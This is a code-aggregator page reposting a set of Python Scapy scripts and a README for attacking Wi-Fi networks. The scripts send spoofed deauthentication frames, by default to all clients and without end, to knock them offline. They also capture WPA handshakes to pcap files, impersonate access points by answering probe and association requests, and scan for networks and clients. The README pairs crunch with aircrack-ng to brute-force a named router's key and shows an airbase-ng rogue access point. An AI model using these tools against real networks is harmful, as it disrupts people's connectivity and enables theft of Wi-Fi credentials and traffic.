python Deauth攻击

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python Deauth攻击相关的知识,希望对你有一定的参考价值。


import argparse
from scapy.all import *

def perform_deauth(bssid, client, count):
	"""
	Send Deauth packets
	"""
	packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
	for n in range(int(count)):
		sendp(packet)
		
	"""
	pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
	cli_to_ap_pckt = None
	if client != 'FF:FF:FF:FF:FF:FF' :
		cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
	print 'Sending Deauth to ' + client + ' from ' + bssid
	if not count:
		exit()
	count = int(count)
	for x in range(0, int(count)):
		try:
			# Send out deauth from the AP
			sendp(pckt)
			# If we're targeting a client, we will also spoof deauth from the client to the AP
			if client != 'FF:FF:FF:FF:FF:FF':
				send(cli_to_ap_pckt)

		except KeyboardInterrupt:
			break
	"""

def attackTarget(bssid):
	"""
	Attack the target
	"""
	print "\n\n"
	print '='*100
	# Now we have a bssid that we have detected, let's get the client MAC
	target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
	if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
	deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
	print "\n\n"
	print '='*100
	if not deauth_pckt_count:
		deauth_pckt_count = -1
	perform_deauth(bssid, target_client, deauth_pckt_count)

def main():
	#Set the command line options
	parser = argparse.ArgumentParser( description='attack.py - Send Deauth packets')
	parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
	parser.add_argument('-c', '--channel', dest='channel', type=str, required=False, help='Wifi Channel')
	parser.add_argument('-b', '--bssid', dest='bssid', type=str, required=True, help='BSSID')
	#Get the command line options
	args = parser.parse_args()
	#start the attack
	attackTarget(args.bssid)

if __name__ == "__main__":
	main()
import sys
from scapy.all import *
import datetime




"""
Capture Hand Shake
"""
class CaptureHandShake():
	
	"""
	Init
	"""
	def __init__(self, iface):
		self.wpa_handshake = []
		self.iface = iface
		self.acceptAny = False
		self.packetMax = 100
		self.packetCount = 0
	
	"""
	Handle the packets
	"""
	def handle_packet(self, packet):
		
		if self.acceptAny == True:
			print packet.summary()
			self.wpa_handshake.append(packet)
			self.packetCount += 1
			
			if self.packetCount == self.packetMax:
				filename = "pcaps/wpa-handshake-" + str(datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")) + ".pcap"
				wrpcap(filename, self.wpa_handshake)
				self.wpa_handshake = []
				self.acceptAny = False
				self.packetCount = 0
		else:
			#got EAPOL KEY packet
			if (packet.haslayer(EAPOL) and packet.type == 2) or self.acceptAny == True:
				print packet.summary()
				self.wpa_handshake.append(packet)

			#if we have 4 packets		
			if len(self.wpa_handshake) >= 4:
				self.acceptAny = True
				print "\n"
				print '='*100
				print "\n"
					
				

	"""
	Start the sniffer
	"""
	def start(self):
		os.system("clear")
		print '='*100
		print "Sniffing on interface: " + self.iface
		print '='*100
		sniff(iface=self.iface, prn=self.handle_packet)
	


def main():

	if len(sys.argv) ==  2:
		iface = str(sys.argv[1])
	else:
		iface = "wlan0"

	sn = CaptureHandShake(iface)
	sn.start()




if __name__ == '__main__':
	main()





import os
import sys
import time
import getopt
from scapy.all import *

"""
use: ip addr to get mac address info
"""
iface = "wlan0"
ssid_filter = []
client_addr = None
mymac = "00:c0:ca:87:58:3d"

def get_rates(packet):
    """
    Extract rates and esrates from elt header
    """
    rates = "\x82\x84\x0b\x16"
    esrates = "\x0c\x12\x18"
    while Dot11Elt in packet:
        packet = packet [Dot11Elt]
        if packet.ID == 1:
            rates = packet.info
        elif packet.ID == 50:
            esrates = packet.info
        packet = packet.payload
    return [rates, esrates]

def send_probe_response(packet):
    """
    send a prob response
    """
    ssid = packet.info
    rates = get_rates(packet)
    channel = "\x07"

    if ssid_filter and ssid not in ssid_filter:
        return
    print "\n\nSending probe response for " + ssid + " To " + str(packet[Dot11].addr2) + "\n"
    # addr1 = Destination, addr2 = source,
    # Addr3 = Access Point
    # Dsset sets channel
    cap = 'ESS+privacy+short-preamble+short-slot'
    resp = RadioTap() / \
        Dot11(addr1 = packet[Dot11].addr2, addr2 = mymac, addr3 = mymac) / \
        Dot11ProbeResp(timestamp = time.time(), cap = cap) / \
        Dot11Elt(ID = "SSID", info = ssid) / \
        Dot11Elt(ID = "Rates", info = rates[0]) / \
        Dot11Elt(ID = "DSset", info = channel) / \
        Dot11Elt(ID = "ESRates", info = rates[1])

    sendp(resp, iface = iface)

def send_auth_response(packet):
    """
    Do not answer our own auth packets
    """
    if packet[Dot11].addr2 != mymac:
        print "Sending authentication to " + packet[Dot11].addr2
        res = RadioTap() / \
            Dot11(addr1 = packet[Dot11].addr2, addr2 = mymac, addr3 = mymac) / \
            Dot11Auth(algo = 0, seqnum = 2, status = 0)
        sendp(res, iface = iface)

def send_association_response(packet):
    """
    send_association_response
    """
    if ssid_filter and ssid not in ssid_filter:
        return
    ssid = packet.info
    rates = get_rates(packet)
    print "Sending Association response for " + ssid + " To " + packet[Dot11].addr2

    res = RadioTap() / \
        Dot11(addr1 = packet[Dot11].addr2, addr2 = mymac, addr3 = mymac) / \
        Dot11AssoResp(AID = 2) / \
        Dot11Elt(ID = "Rates", info = rates[0]) / \
        Dot11Elt(ID = "ESRates", info = rates[1])

    sendp (res, iface = iface)

def handle_packet (packet):
    """
    This function is called for every captured packet
    """
    sys.stdout.write(".")
    sys.stdout.flush()

    if client_addr and packet.addr2 != client_addr:
        return
    # Got probe request
    if packet.haslayer(Dot11ProbeReq):
        send_probe_response(packet)
    # Got Authenticaton request
    elif packet.haslayer(Dot11Auth):
        send_auth_response(packet)
    # Got association request
    elif packet.haslayer(Dot11AssoReq):
        send_association_response (packet)

def usage ():
    print sys.argv [0]
    print """
    -A <addr> (optional)
    -I <interface> (optional)
    -M <source_mac> (optional)
    -S <ssid1,ssid2> (optional)
    """
    sys.exit (1)

# Parsing parameters
if len (sys.argv) == 2 and sys.argv [1] == "- help":
    usage()

try:
    cmd_opts = "a: i: m: s: "
    opts, args = getopt.getopt (sys.argv [1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt [0] == "a":
        client_addr = opt
    elif opt [0] == "-i":
        iface = opt [1]
    elif opt [0] == "-m":
        my_mac = opt [1]
    elif opt [0] == "-s":
        ssid_filter = opt
    else:
        usage()

os.system("ifconfig " + iface + " down")
os.system("iwconfig " + iface + " mode monitor")
os.system("ifconfig " + iface + " up")

#Start sniffing
print "Sniffing on interface: " + iface
sniff (iface = iface, prn = handle_packet)

import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading

channel_hop = None
networks = {}
stop_sniffing = False

def add_network(pckt):
    """
    Add a found network to the list
    """
    essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
    bssid = pckt[Dot11].addr3
    channel = int(ord(pckt[Dot11Elt:3].info))
    if bssid not in networks:
        networks[bssid] = ( essid, channel )
        print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)

def channel_hopper(iface):
    """
    Switch channels
    """
    while True:
        try:
            channel = random.randrange(1,14)
            os.system("iwconfig %s channel %d" % (iface, channel))
            time.sleep(1)
        except KeyboardInterrupt:
            stop_sniffing = True
            break

def start_sniffer(iface):
    """
    Start the network sniffer
    """
    stop_sniffing = False
    os.system("clear")
    print '='*100
    print "\nPress CTRL+c to stop sniffing..\n"
    print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100

    channel_hop = Process(target = channel_hopper, args=(iface,))
    channel_hop.start()

    try:
        sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=stop_sniffing, prn=lambda x: add_network(x) )
        print'----> after sniff'
    except Exception, e:
        print 'Err: ' + str(e)
        pass

def monitorMode(iface):
    """
    Turn on monitor mode
    """
    os.system("ifconfig " + iface + " down")
    os.system("iwconfig " + iface + " mode monitor")
    os.system("ifconfig " + iface + " up")

def main():
    """
    Set the command line options
    """
    parser = argparse.ArgumentParser( description='deauth.py - Perform a Deauth WIFI Attack - python deauth.py -i wlan0 -m 1')
    parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
    parser.add_argument('-m', '--monitormode', dest='monitor', type=str, required=False, help='Activate Monitor Mode')

    args = parser.parse_args()
    conf.iface = args.iface
    monitorMode(conf.iface)
    start_sniffer(conf.iface)

if __name__ == "__main__":
	main()
### Deauth

#### network-scanner.py
```
python network-scanner.py -i wlan0
```
#### set-channel.py
```
python set-channel.py -i wlan0 -c 6
```
#### scan-clients.py 
```
python scan-clients.py -i wlan0 -c 1 -b 90:4d:4a:6b:f5:a9
```
#### scan-connections.py 
```
python scan-connections.py -i wlan0 -c 1 -b 90:4d:4a:6b:f5:a9
```
#### attack.py
```
python attack.py -i wlan0 -c 1 -b 90:4d:4a:6b:f5:a9
```
#### capture-handshake.py
```
capture-handshake.py wlan0
```
### crunch
Sky Router from a couple of years ago:
```
crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ | aircrack-ng -b 6C:70:9F:E0:C0:78 -w - *.pcap
```
### misc
```
sudo airodump-ng-oui-update
```

```
airodump-ng wlan0
airbase-ng -a 4C:17:EB:AF:AD:4F --essid "SKYFAD4E" -c 1 wlan0
```

import argparse
from scapy.all import *

iface = None
channel = None
bssid = None

def packet_info(pkt):
    """
    show the packet details
    """
    bssid = pkt[Dot11].addr3
    p = pkt[Dot11Elt]
    cap = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}"
                      "{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
    ssid, channel = None, None
    crypto = set()
    while isinstance(p, Dot11Elt):
        if p.ID == 0:
            ssid = p.info
        elif p.ID == 3:
            channel = ord(p.info)
        elif p.ID == 48:
            crypto.add("WPA2")
        elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
            crypto.add("WPA")
        p = p.payload
    if not crypto:
        if 'privacy' in cap:
            crypto.add("WEP")
        else:
            crypto.add("OPN")
    print "    %r [%s], %s" % (ssid, bssid,' / '.join(crypto) )

def switchChannel(iface, channel):
	"""
	swicth to a channel
	"""
	os.system("iwconfig %s channel %d" % (iface, channel))

def getClients(pkt):
	"""
	Get the clients for the BSSID
	"""
	try:
		packet_bssid = pkt[Dot11].addr3
		if packet_bssid == bssid and not pkt.haslayer(Dot11Beacon) and not pkt.haslayer(Dot11ProbeReq) and not pkt.haslayer(Dot11ProbeResp):
			print pkt.summary()
		elif packet_bssid == bssid and ( pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeReq) or pkt.haslayer(Dot11ProbeResp) ):
			print('---> Known BSSID')
			#http://stackoverflow.com/questions/21613091/how-to-use-scapy-to-determine-wireless-encryption-type
			packet_info(pkt)
	except:
		pass

def sniffClients():
	"""
	Set the target channel, start sniffing, send packets to getClients()
	"""
	stopSniffing  = False
	sniff(iface=iface, prn=getClients, stop_filter=stopSniffing )

	while True:
		try:
			num = 1
		except KeyboardInterrupt:
			stopSniffing = True
			pass

def main():
	#parse args
	parser = argparse.ArgumentParser( description='search-clients.py - Search for clients on Channel / BSSID')
	parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
	parser.add_argument('-c', '--channel', dest='channel', type=str, required=True, help='Wifi Channel')
	parser.add_argument('-b', '--bssid', dest='bssid', type=str, required=True, help='BSSID')

	#set args
	args = parser.parse_args()
	iface = args.iface
	channel = args.channel
	bssid = args.bssid

	#sniff for clients
	sniffClients()

if __name__ == "__main__":
	main()

import argparse
from scapy.all import *

iface = None
channel = None
bssid = None

def switchChannel(iface, channel):
	"""
	swicth to a channel
	"""
	os.system("iwconfig %s channel %d" % (iface, channel))

def getClients(pkt):
	"""
	Get the clients for the BSSID
	"""
	packet_bssid = pkt[Dot11].addr3
	if packet_bssid == bssid and ( pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeReq) or pkt.haslayer(Dot11ProbeResp) ):
		print pkt.summary()

def sniffClients():
	"""
	Set the target channel, start sniffing, send packets to getClients()
	"""
	stopSniffing  = False
	sniff(iface=iface, prn=getClients, stop_filter=stopSniffing )

	while True:
		try:
			num = 1
		except KeyboardInterrupt:
			stopSniffing = True
			pass

def main():
	#parse args
	parser = argparse.ArgumentParser( description='search-clients.py - Search for clients on Channel / BSSID')
	parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
	parser.add_argument('-c', '--channel', dest='channel', type=str, required=True, help='Wifi Channel')
	parser.add_argument('-b', '--bssid', dest='bssid', type=str, required=True, help='BSSID')

	#set args
	args = parser.parse_args()
	iface = args.iface
	channel = args.channel
	bssid = args.bssid

	#sniff for clients
	sniffClients()

if __name__ == "__main__":
	main()

import argparse
from scapy.all import *

def setChannel(iface, channel):
    """
    Switch channels
    """
    os.system("iwconfig %s channel %d" % (iface, channel))

def monitorMode(iface):
    """
    Turn on monitor mode
    """
    os.system("ifconfig " + iface + " down")
    os.system("iwconfig " + iface + " mode monitor")
    os.system("ifconfig " + iface + " up")

def main():
    """
    run script
    """
    parser = argparse.ArgumentParser( description='deauth.py - Perform a Deauth WIFI Attack - python deauth.py -i wlan0 -m 1')
    parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
    parser.add_argument('-c', '--channel', dest='channel', type=str, required=True, help='WIFI Channel')
    args = parser.parse_args()
    monitorMode(args.iface)
    setChannel(args.iface, args.channel)

if __name__ == "__main__":
	main()

以上是关于python Deauth攻击的主要内容,如果未能解决你的问题,请参考以下文章

python Deauth攻击

python Deauth攻击

WiFi攻击进阶版——Deauth攻击

IEEE80211W

deauth after eapol key exchange sequence啥意思

无线网络中,使用MDK3把指定的用户或者热点踢到掉线(转)